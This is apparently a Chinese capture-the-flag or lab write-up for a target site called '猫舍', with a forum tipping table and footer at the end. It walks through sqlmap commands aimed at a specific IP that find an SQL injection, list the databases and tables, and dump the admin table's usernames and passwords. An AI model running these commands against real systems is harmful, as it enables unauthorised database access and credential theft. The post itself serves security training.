首先,Xray扫描
我们可以看到有两个漏洞,第一个是SQL注入 ,第二个是phpstudy漏洞
让用SQL注入做,第二个漏洞直接抛弃!
打开SQLmap,检测数据库类型
sqlmap -u "http://59.63.200.79:8003/?id=1"
mysql
查询有哪些数据库
sqlmap -u "http://59.63.200.79:8003/?id=1" –dbms mysql –level 3 –dbs
发现可用的数据库有三个
网站名叫猫舍,数据库呢还不是maoshe???
查询maoshe数据库中有哪些表
sqlmap -u "http://59.63.200.79:8003/?id=1" –dbms mysql –level 3 -D maoshe –tables
发现有4个表
admin一般和管理员相关
查询maoshe数据库中admin表有哪些字段
sqlmap -u "http://59.63.200.79:8003/?id=1" –dbms mysql –level 3 -D maoshe -T admin –columns
有3个字段
同时查询maoshe数据库中admin表下的username和password字段
sqlmap -u "http://59.63.200.79:8003/?id=1" –dbms mysql –level 3 -D maoshe -T admin -C “username,password” –dump
有两条数据
用户名和密码都出来了
flag就是密码
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
2269064521 | 5.00 | 0 | 2021-03-16 14:02:50 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.